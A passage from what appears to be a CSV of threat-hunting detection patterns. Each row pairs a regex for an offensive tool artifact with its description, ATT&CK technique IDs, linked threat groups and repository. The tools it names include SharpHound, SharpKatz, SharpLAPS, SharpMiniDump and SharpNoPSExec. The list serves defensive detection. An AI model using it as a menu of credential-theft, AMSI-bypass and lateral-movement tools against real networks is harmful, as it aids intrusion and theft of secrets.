- Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" "*SharpHound.exe*",".{0,1000}SharpHound\.exe.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. 
with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*SharpHound.exe*",".{0,1000}SharpHound\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" "*SharpHound.exe*",".{0,1000}SharpHound\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*sharphound.exe*",".{0,1000}sharphound\.exe.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","1","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*SharpHound.exe*",".{0,1000}SharpHound\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpHound.exe*",".{0,1000}SharpHound\.exe.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*SharpHound.exe*",".{0,1000}SharpHound\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*SharpHound.ps1*",".{0,1000}SharpHound\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" 
"*SharpHound.ps1*",".{0,1000}SharpHound\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" "*SharpHound.ps1*",".{0,1000}SharpHound\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*SharpHound.ps1*",".{0,1000}SharpHound\.ps1.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*SharpHound.ps1*",".{0,1000}SharpHound\.ps1.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*SharpHound.ps1*",".{0,1000}SharpHound\.ps1.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*SharpHound2*",".{0,1000}SharpHound2.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - 
TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*Sharphound2.*",".{0,1000}Sharphound2\..{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" "*SharpHound3*",".{0,1000}SharpHound3.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*Sharphound-Aggressor*",".{0,1000}Sharphound\-Aggressor.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" "*SharpHoundCommon.*",".{0,1000}SharpHoundCommon\..{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*SharpHoundCommonLib*",".{0,1000}SharpHoundCommonLib.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*sharpinline *",".{0,1000}sharpinline\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - 
T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Sharpkatz*",".{0,1000}Sharpkatz.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpKatz.exe*",".{0,1000}SharpKatz\.exe.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*SharpKatz.exe*",".{0,1000}SharpKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpKatz.exe*",".{0,1000}SharpKatz\.exe.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*SharpkatzManager*",".{0,1000}SharpkatzManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*Sharp-Killer.csproj*",".{0,1000}Sharp\-Killer\.csproj.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","10","4","338","41","2024-01-25T09:24:57Z","2023-10-21T17:27:59Z" "*Sharp-Killer.exe*",".{0,1000}Sharp\-Killer\.exe.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","10","4","338","41","2024-01-25T09:24:57Z","2023-10-21T17:27:59Z" "*Sharp-Killer.pdb*",".{0,1000}Sharp\-Killer\.pdb.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","10","4","338","41","2024-01-25T09:24:57Z","2023-10-21T17:27:59Z" "*SharpKiller-main*",".{0,1000}SharpKiller\-main.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","10","4","338","41","2024-01-25T09:24:57Z","2023-10-21T17:27:59Z" "*SharpLAPS.csproj*",".{0,1000}SharpLAPS\.csproj.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","10","4","363","71","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" "*SharpLAPS.exe*",".{0,1000}SharpLAPS\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpLAPS.exe*",".{0,1000}SharpLAPS\..{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","10","4","363","71","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" "*SharpLAPS.sln*",".{0,1000}SharpLAPS\.sln.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","10","4","363","71","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" "*SharpLAPS-main*",".{0,1000}SharpLAPS\-main.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","0","N/A","10","4","363","71","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" "*SharpLDAP.csproj*",".{0,1000}SharpLDAP\.csproj.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","N/A","N/A","N/A","N/A","N/A" "*SharpLDAP.exe*",".{0,1000}SharpLDAP\.exe.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims 
to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","N/A","N/A","N/A","N/A","N/A" "*SharpLDAP.sln*",".{0,1000}SharpLDAP\.sln.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","N/A","N/A","N/A","N/A","N/A" "*SharpLDAP-main*",".{0,1000}SharpLDAP\-main.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","N/A","N/A","N/A","N/A","N/A" "*SharpLdapRelayScan*",".{0,1000}SharpLdapRelayScan.{0,1000}","offensive_tool_keyword","SharpLdapRelayScan","SharpLdapRelayScan is a tool to check Domain Controllers for LDAP server protections regarding the relay of NTLM authentication and it's a C# port of LdapRelayScan","T1557.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/klezVirus/SharpLdapRelayScan","1","1","N/A","7","1","75","17","2022-02-26T22:03:11Z","2022-02-12T08:16:59Z" "*SharpLdapRelayScan*",".{0,1000}SharpLdapRelayScan.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*SharpMapExec.exe*",".{0,1000}SharpMapExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools.
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpMiniDump*",".{0,1000}SharpMiniDump.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpMiniDump.exe*",".{0,1000}SharpMiniDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpMiniDumpManager*",".{0,1000}SharpMiniDumpManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpMove.exe*",".{0,1000}SharpMove\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpNamedPipePTH.exe*",".{0,1000}SharpNamedPipePTH\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpNoPSExec.csproj*",".{0,1000}SharpNoPSExec\.csproj.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","587","88","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*SharpNoPSExec.exe*",".{0,1000}SharpNoPSExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpNoPSExec.exe*",".{0,1000}SharpNoPSExec\.exe.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","587","88","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*SharpNoPSExec.sln*",".{0,1000}SharpNoPSExec\.sln.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","587","88","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*SharpNoPSExec-master*",".{0,1000}SharpNoPSExec\-master.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral 